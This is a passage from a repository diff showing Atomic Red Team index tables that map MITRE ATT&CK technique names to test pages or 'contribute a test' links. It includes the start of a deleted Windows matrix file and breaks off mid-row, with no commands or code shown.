| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
-183
View File
@@ -1,183 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | [Protocol 